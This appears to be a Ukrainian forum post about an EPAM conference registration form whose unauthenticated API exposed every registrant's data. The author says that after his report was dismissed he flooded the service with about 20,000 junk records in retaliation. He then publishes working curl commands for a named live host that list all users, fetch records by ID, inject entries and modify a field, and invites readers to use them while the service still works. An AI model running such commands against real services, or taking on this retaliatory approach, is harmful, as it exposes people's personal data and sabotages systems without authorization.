JeeKiev і халявна база кандидатів від ЕРАМ
Мої вітаннячка, хочу розповісти невелику історію як не поважати юзер інфо, і не поважати того хто тобі розповідає про бажини.
Поїхав я от на цю гарну конфу, котра була в Києві
Наткнувся на ЕРАМ котрий казав:
— ви мол зарегайтесь в нас на формочці, онлайн, і зможете прийняти участь в розіграші "квартири, машини, золотого батона..."(якійсь борд, павербанкі...)
підюзати формочку можна було на їх кампі — шо не цікаво, тому я записав урлу, відкрив формочку і почав по ній шаритись.
формочку можна знайти тут: epam-reg.herokuapp.com
перше шо стало цікаво ритись в скірптах, і нетворку — куда ж вона шле запити, і за пару сек найшов апішку:
epam-reg.herokuapp.com/api/users
куда слався пост
попробував послати GET — і шо ви думаєте, оця штука видала мені всіх хто там зареганий, ще й з внутрішнімі айдішками бази, судячи по айдішкам там в них монга.
я, як добрий саморитянин, пішов до них і сказав — мол пацани ну не гарно отак робити, на шо получив просто чарівну відповідь:
— а чому ви взагалі там лазили
мене ця відповідь трошка засмутила, і я почав там лазити активніше.
в результаті найшов шо пости можна слати з предефайнет айдішками, шо можна доступитись до кожного юзера окремо, і модифікувати одне поле.
ще знайшов шо дубліками ми не перевіряєм — і так шоб намікнути їм чого я там лажу, вальнув коло 20к записів з однаковим імейлом іменем...
після чого гет запит, видай всіх юзерів, перестав працювати :)
Висновкі, чисто мої субєктивні:
поважайте юзер дату
не посилайте людей котрі вам говорять про дірки в вашій аплікусі
список чого я знайшов з курлами, і як постучати, покі воно ще живе:
curl -XPOST -v ’epam-reg.herokuapp.com/api/users/ -d ’{"firstname":"-2«, «lastname»: «-2», «email»: «[email protected]», «city»: «-7», "framework":"evil«, «skill»: "whoKnows«}’ -H «content-type: application/json»
просим всіх юзерів(зара не працює бо сервак офігеває від сміття):
curl -XGET -v ’epam-reg.herokuapp.com/api/users/
curl -XGET -v ’epam-reg.herokuapp.com/...592bf849690f2c000fd6f9d9
працює тільки для поля «framework»:
curl -XPUT -v ’epam-reg.herokuapp.com/...592bf849690f2c000fd6f9d9 -H «content-type: application/json» -d ’{"framework": "not"}’
UPD: формочка померла
50 коментарів
Додати коментар Підписатись на коментаріВідписатись від коментарів